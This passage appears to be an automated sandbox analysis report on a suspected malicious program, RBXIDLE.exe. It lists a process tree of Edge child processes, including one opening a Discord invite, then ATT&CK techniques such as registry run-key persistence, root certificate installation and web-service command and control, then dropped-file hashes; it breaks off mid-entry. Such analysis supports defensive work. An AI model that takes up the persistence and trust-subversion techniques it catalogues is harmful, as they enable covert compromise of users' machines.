- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2152,1280012483325310682,6012165667665751052,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5548
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2152,1280012483325310682,6012165667665751052,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:2
  2⤵
  PID:5540

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService
1⤵
PID:5752

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5888

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5996

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4952

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
PID:4392
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/XB94k6SxWN
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of SendNotifyMessage
  PID:6844
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcc0b546f8,0x7ffcc0b54708,0x7ffcc0b54718
    3⤵
    PID:6932
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,15414619023818720812,14897947681140636277,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2592 /prefetch:8
    3⤵
    PID:6352
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,15414619023818720812,14897947681140636277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
    3⤵
    PID:6492
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,15414619023818720812,14897947681140636277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
    3⤵
    PID:6480
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,15414619023818720812,14897947681140636277,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:6360
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,15414619023818720812,14897947681140636277,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2
    3⤵
    PID:6368
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,15414619023818720812,14897947681140636277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4504 /prefetch:1
    3⤵
    PID:6220
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2128,15414619023818720812,14897947681140636277,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5364 /prefetch:8
    3⤵
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    PID:6764
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2128,15414619023818720812,14897947681140636277,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3784 /prefetch:8
    3⤵
    PID:6512
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,15414619023818720812,14897947681140636277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3572 /prefetch:1
    3⤵
    PID:3272
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,15414619023818720812,14897947681140636277,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3564 /prefetch:8
    3⤵
    PID:5792
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,15414619023818720812,14897947681140636277,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3464 /prefetch:1
    3⤵
    PID:5692
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,15414619023818720812,14897947681140636277,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3564 /prefetch:8
    3⤵
    PID:6296
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,15414619023818720812,14897947681140636277,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5912 /prefetch:1
    3⤵
    PID:5972
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,15414619023818720812,14897947681140636277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5640 /prefetch:1
    3⤵
    PID:2104
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,15414619023818720812,14897947681140636277,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4352 /prefetch:2
    3⤵
    PID:880

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:7100

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3732

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
120B

MD5
e4234377d890264c333984bcedc534d5

SHA1
f610986b02072ef6ec009513f3e7fd997ec4802d

SHA256
c99644b62431103452f64807bd2c9c0c20d6dc028fb64f91eb6081420df3f596

SHA512
58f26ab5aaedfdf38f49130190bd614bf44f6e27464be6ee0cbc08f8df5d2ee3151ccb4d3e69b0207d5f39f8e9ab49971e433976d5422e755a308bca64442a90

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

Filesize
64KB

MD5
40fa42e1a199ff8f23bfee7c422a7f5d

SHA1
6b7a768b337df39056f6385c754e9c94e34dffda

SHA256
01d033fee900a4b5bf6c489a01812f29ebf6b8cb5540c5b35116df3fae6351cd

SHA512
2cb076f1496762b145f5250aaad13a91865e3a50c75167033b0f80be53cbeeb2f0a305b8f8b5b28d368e81133fc9a4c9a6ae3f0331ecd5745894c7effb730407

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
f983034d04d54b66021ecd0743c6c5f8

SHA1
56bd9c0d2f852e4a47160c013b4aa6d81e0ff874

SHA256
af11e256ab7f8e2c154cc36795a0e76bec25bc9a25670aff165106d08ad5b8a5

SHA512
15bcc714a06cac8690a33efa1e95a6eee8ca0b9f3f92acab59229c8cb9c93fcbca629a9468a485393fe0882317044902ee2975eabc4b0e19a9796c2ecdebd313

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
072a41550fec946c8882a25e6ba7cf78

SHA1
956ae5a66ed3ab31a5c33de7ffda947dd17672d7

SHA256
7c18c00d46b2b0445740c63c6652a5d6f089ef4369509c6bc94213ab821c349a

SHA512
da8aec715bb4c97f3f61de9ed694215124b90ca59e1c860ec25b2661654d4453adf221f951e97ca1376008194de271fa8d9c6a947eb709f7843287e4d4989457

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
93fa50d67994d9e626922add29e557a6

SHA1
a40cd30e41d320393ae313532ac2691f27a79484

SHA256
dc2fcbb2fd5fbc139ad581ffc23d24f6ff82fd8730695f24f6a9a70c93ffb7ee

SHA512
eae490f40523b3e6645788f50c4711f1dc2026ddef9bc6b6fd2a65a2bbe5e160d41209d24d5212bf0653cc4e30c891f72abd97312dbf98c9070150486c18dc72

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
97b72c35a1631153cc635fb4724ee92a

SHA1
a6927b52610d772d7af2b774c721c27fcfcaeb63

SHA256
6e9560bac2897bd113717cd65e71bee2419b91e64d77244d60b111f0db8ba5fc

SHA512
e9baeede5584e333d410d0bc5401ae6f56cc67842ab98cd0f6394b5410be20c4933cbbafddf1368432d180dc085da7ff2a064be9d4bcd4dad6139a0f7ecf26d6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
130KB

MD5
b780c3dd440a96576af3bf3ccb5d903d

SHA1
799c8a6bff3e26c1c01913db1c5b58fd0b1fe0db

SHA256
5cf18b8f18b2664d7190a78bee2d1722c4bf60b7f8c739a22746f3547237c23b

SHA512
71069acf4f5872c039654d14e812336e0e1d474a11127935b3afa8e42e664b185ceb86f87c63eb2dc0470b80f1058e11c089b433f017dd55e22a4d735608deb8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
130KB

MD5
511161bcf91cb66ba46225d917fa83c8

SHA1
5f6ee294e102ef966a942e245bd9b653799d7b9a

SHA256
e19da6ec0b31262fe9b86d347c8f2bc5a5c009683eab2437b80d1cdab8699802

SHA512
7889b361717b30cb8c726b57e7bd220a0a02906c98f8c1a219ba0e8b6be7012a6707f425ba8bb079af97a3eac96b5e94da496a9a407422dabfbcce65fbf9cff4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\1d2e3d67-35e8-42f2-9a27-083ceb98f9fb.tmp

Filesize
12KB

MD5
814f0d145acf9ccaf1a444320093c809

SHA1
1d10140f53f7f8464c6e2081331c949b5153255e

SHA256
45ed2ac510d3f0cf3ab500267bbaaf1cc678a794a3b2fef10f08a6f3eebe55c4

SHA512
28f1b2c5efd92a1e3d7ea7a009d242cbf66c879132e43ffd2ce959ba26cb6ee81e7f2f220c944702c889765dbc923f7012334d4af8651d3eac38e6fd670bc428

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
91746379e314b064719e43e3422d0388

SHA1
65f1a2b5a93922d589142a6edf99b5b35d986dba

SHA256
0b3cf8ae20afd84c9bf06546e876c84922cb5800526df72a628479f4d5487df7

SHA512
a783d8d9613cf92020fc36fd27d384dbd4e105a1ebd02c4507bf7263e61ff5b377e6d1734b066700782fa64bcbeb11af31ac3972d404625cbdb587cfa3bc0808

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
2f6da5b7f8dc997cc2ac7ee8a2411f76

SHA1
409ab9cbee1d06d925ec1a4470cbf14f4dcd9a3a

SHA256
6b1d2f8f00e45a3cc3fb419b8f59421644ac589a870e9c30102719eabb914006

SHA512
97743933919810b591fd9dac84bf793f07735180e5ed88e0a773a5c4db55228ce9f0f30627c8e0b16e038dcf152cf36e4f22ff787c815e739296d17239ef09c7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
ccf8b7b618672b2da2775b890d06c7af

SHA1
83717bc0ff28b8775a1360ef02882be22e4a5263

SHA256
ef08e2971a9ba903c9b91412275b39aabfd6d4aa5c46ade37d74ff86f0285420

SHA512
eb550889db8c4c0e7d79b2bd85c7d0e61b696df10ce3d76c48ab21b935c7ecc7b12403a00d6570e7d8e4121f72747242c2358f8f0823f804e704bd44ed603b97

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\4cd4f11e-8420-41ef-af94-63ea63952581.tmp

Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
7a13fccf906ab8d6157c8d8835522cab

SHA1
c73b06e4391fea80802ab4aeff0c5227e54033fe

SHA256
43d936770d28977f4249dc2544ef096354b4683bfa2661ce2dd83329e993855f

SHA512
b13558e4b85eeabb5446e636c7982bbdcf46ca4fffa6ecebb1bc52b82e72e7aa32c4b13dcedcf4d78fd3f0ae5e36ff9d5f3719f9cf485731c96a560e0728e7e8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
111B

MD5
807419ca9a4734feaf8d8563a003b048

SHA1
a723c7d60a65886ffa068711f1e900ccc85922a6

SHA256
aa10bf07b0d265bed28f2a475f3564d8ddb5e4d4ffee0ab6f3a0cc564907b631

SHA512
f10d496ae75db5ba412bd9f17bf0c7da7632db92a3fabf7f24071e40f5759c6a875ad8f3a72bad149da58b3da3b816077df125d0d9f3544adba68c66353d206c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
323B

MD5
1eaf2f4407244a1168b2d6fc8ca87880

SHA1
6b1b7aa5a43b129d90ec32a0e906a061ed9d8b1b

SHA256
12e0f5280e07cd6ee13b9cdd280096fb7ee853aaa614d6e7894e017d55f0972c

SHA512
387f366d44dba0b3c10cfae93b095d8ba2951d0933a3fca82ea6e3b0bb8b12b914d563406b975f98d60135e1fdb7b5006c116b4a651373dc3da22915e9f7055c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
a51d3f8a28ff34f9eb40c027af2fa9d5

SHA1
d1089dbf53f46ea4b517c816482ce7ad099cd491

SHA256
9f3b56e628b7c1328ba8ed7d5d803bba7973cff35fc2836e001ccdf5f9cfc953

SHA512
9c93256a6d20eb0db5471276583a2b585bd9e55c5dd2d650039633d33e74abb6f59e57482a89bdfcf11cbc1eafd2614b3f96d8fb2eff49877d950033aded0c73

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
03482f365179a88c1a111ac70b614f74

SHA1
bb4ebaf0387cd0d0406855e14097d462ca31ff10

SHA256
5826a006bccea79dfa5588091e9a7c5e3faa51c41beb578d5b186d455d5337ff

SHA512
1ab47400cf60c8dc9bc3bab217ffbec172be1446671ad7faa58317bba862ccb93db8e777ccffd35daf28b54d32c8540c4edf97b28ab7e76e0d63804ec253ffaa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
be8b534b697fec65ce3310b4908f66db

SHA1
8230d708910f7fef6e31d57c6f7b554fa35c4f63

SHA256
d8c212809da47a6a721081f3f9c83af6cb415cedc7cf99618828e7ad5ca133c6

SHA512
237766141bff35252b5ebd3c0634673c9d01bbebb93d6bd97627ec5b1b5ac856729ad2fcd7ecf1db2a3bfc560371635f4db32cc4758ae51e03b974f1bc96b805

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
34218264cdcd458007002aa6a42bc915

SHA1
c36eddae24604dc20af81abce91f6de8e1e24c6a

SHA256
32ce712f0ca9047628bef275dffe34891318efd079507621a80a8ca0c5ac8890

SHA512
3e2f451a908fe02441948b0a5db077df6c8401e908e440e4282f2730e73af6cf28159f42605ed31544076c1d6458768f8a8a8807d86d2ffb582bcfa552e5993e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
b13b25d64776c12a24b384e871821f57

SHA1
aa2421ae8b1857030e3b42175f5498bb1329dbd9

SHA256
a73ddf7b08b2ff843fbbb9a70c6bc82da23ef6735ca43d433db70a695a764e52

SHA512
003d06c4d8e6d4114a97126e5aeccc7f9e4659cda86ba9a4851a17061627da89ddb263ca2da4243e9b22d6e53ca302ecfb06eaf672c67dcc32f3cc9012abd9ba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
370B

MD5
3488050da44192dac6a9a844a22e5351

SHA1
36826c0e8f37721de4e89cd3c6d5a0be185414fb

SHA256
2dd378a10c44d9ec2d190e7f856f05a6606924dc0720cda43d38f31d2c2fb1a1

SHA512
3c31c9afb9c89f8466c4df0acc8b9c3463864558cb8e06dd8b55086a9428f0c458bc9971fbec24745108081cfb23924672d76d4c0a98f9e4fee174ec37a06792

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
370B

MD5
197afe1c5a0e00f1aaa81b6fa4d06391

SHA1
4dfff48d22238da747724194dc5336eb64cdcfee

SHA256
43aa8e943254b4464fc11e7f563fb225cc2721580dd2c41c85d1c7a9db4badee

SHA512
ef7438e3b8049771037ba24c1c7b4f38388bfbb8fdeef4bf69ae4c9e5216172d56b277126bda33895ba16955e8416ca01ff0d99a82372efce8b06c65fe0fb582

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe59dab6.TMP

Filesize
370B

MD5
c4b3929d2af316939e7e2c9aa36ce3f9

SHA1
713c30d71120bf840f4d2a538c71e7e7e995ec57

SHA256
61a941827feb9f3510458bc849c7772d938975bf118d011bf69acdcdcc78adc7

SHA512
9c2d1022defb3385449a41875de45c4adf2b86248d39c417b1ce3947429dfd8f3b8a1c1e7d25e217321117e9a7ec920ee09f06a17e46b36dda8d4dbeabbb6690

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
8KB

MD5
ac2217621073f89f3152e569e9000eaa

SHA1
529357fb8350b0bb131f5ff4a4ee77f94dda5113

SHA256
eedb94e36a0325edf716beaba1ee878f81e67b88c974f97b613669d403328db3

SHA512
236884b763d7fa01fb8c647506500ce64b070bf7f737f93f5700da33b9fc3384b41dab85e09b3c742492b4ae777de6f07359fbaf326e0f54306f44e14e53dba7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
8KB

MD5
afcc337cef201e73828191e1b6f2990f

SHA1
70bbe4e6abef2cdb7f15032f48a9748d41f56c24

SHA256
4fced404fc274b4531281638200489513663a8afbd407e4161c8ebd11ecb45d5

SHA512
d1c232bea7fb24de04f60f744c9e32c22f4e6a217e059b1ad9c2861207c76aa40d1504ae4003285b7d32ebf093b9f5c907ba04c3d449f48ba4e58c9d8f11b078

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
36892276e6b1619fb09c8056ab8535d8

SHA1
86e345c0abce5230cdcfb5d4c1febbc8fa52ad9a

SHA256
11cb0ffc7db88d754d0491525c041514230ae1b88494f44127677e84f81e9544

SHA512
a96f1ef88c31dfef47d90cc9d4bdfb0c8fd371fb294ffcc496ed7b86b039ffc174df788096ded1151d840ad7940221ba8a11e58833ee350f23cf29018642ce0b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
a26df49623eff12a70a93f649776dab7

SHA1
efb53bd0df3ac34bd119adf8788127ad57e53803

SHA256
4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

SHA512
e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
2f87410b0d834a14ceff69e18946d066

SHA1
f2ec80550202d493db61806693439a57b76634f3

SHA256
5422bc17b852ad463110de0db9b59ffa4219e065d3e2843618d6ebbd14273c65

SHA512
a313702f22450ceff0a1d7f890b0c16cf667dbcd668dbafa6dbecd0791236c0bc68e834d12113cc75352365c2a2b6cfcf30b6ef7c97ea53ed135da50de389db4

Download Submit
C:\Users\Admin\AppData\Local\Programs\RBXIDLE\D3DCompiler_47.dll

Filesize
1.8MB

MD5
4bd170ae7b8e2e10a7f0a57be57657ad

SHA1
cb107d7a812d110223ebfd8d73332aed28703d2f

SHA256
ab0a6bbccdf3535bc6d0ab98008461428dc12eae42a0570f75b40d0a26296148

SHA512
9c83664cd3c88fed64a3a9347a306fb4579cc8584320707eaac69de516462f46cf6232ef495f851d0e28d39d60f6b1268de9e6fb1821e1aea6bbef853f2e5469

Download Submit
C:\Users\Admin\AppData\Local\Programs\RBXIDLE\RBXIDLE.exe

Filesize
512KB

MD5
226b0a81e2714765affd3b35381f06e5

SHA1
9f97102090b7c3358676e1bb9d73cd2298f7bfa9

SHA256
03a59b5c17a4e3dd09d4186b68228d331b2098374b4d22e5dfae67b147350507

SHA512
0afee9adf0972a232d04edb1a225a1068f9fd4d34438c45d2c6ed88a3116a16b06f4a1c10b48fcd21554326073fc392ab6fbf96e3e3fe3eaf442030cbafeecdd

Download Submit
C:\Users\Admin\AppData\Local\Programs\RBXIDLE\RBXIDLE.exe

Filesize
448KB

MD5
7910249df5f557110d446fadf2c0b4b4

SHA1
4ff9e5833e837ece662606855b8339c27b2847d8

SHA256
5e78211b1a395225879db74f8f5ad308863dc0526896d4a5887b8ca7bdd73935

SHA512
49fbbf1eb79d74db0bfe11affaac4c21c18658e381f5420b074d216ac13def82685746c5cf2ff5be87bf12df8cf0b7e35404a708cae3e811d1facbe13b24e6cf

Download Submit
C:\Users\Admin\AppData\Local\Programs\RBXIDLE\RBXIDLE.exe

Filesize
2.2MB

MD5
d23363bc077873b26e49ab58e13c6155

SHA1
77a2f6853a6d35729754ca77bb57f5a2a4e38cab

SHA256
dd993e4f4c73b09853cb86760af1f27afab942bb2263bd245489dea85c5bf9dd

SHA512
33bdb9380f4482fee42e47f7b6e1a22c569337bf154876ae7ff4842346f979e0bd14089c8bdf69c8a477593b108137f79d03b1178c2c0ea731581a679d09bd95

Download Submit
C:\Users\Admin\AppData\Local\Programs\RBXIDLE\RBXIDLE.exe

Filesize
2.3MB

MD5
0846d89ddba407b3effc2d24b13632f4

SHA1
a27a9a43756fa0485293c8626546c9588ca16279

SHA256
552fbd2618a202639b2d0279d657cda40cbfbb44a339d891759c3351e52f1ff0

SHA512
9bce27d7afb5434e12dee903783fb0a6eb8969f701218e2fbdbfe1b7b47dfef0c3f2779a75a2b9f8337636a00d1afd8c9699a3dd8ef71c6fdeefd1e7f793f37b

Download Submit
C:\Users\Admin\AppData\Local\Programs\RBXIDLE\RBXIDLE.exe

Filesize
640KB

MD5
64dcace29a4e8fe41210d009e82f5bae

SHA1
21655d250ad64743584140177e050bb362daf839

SHA256
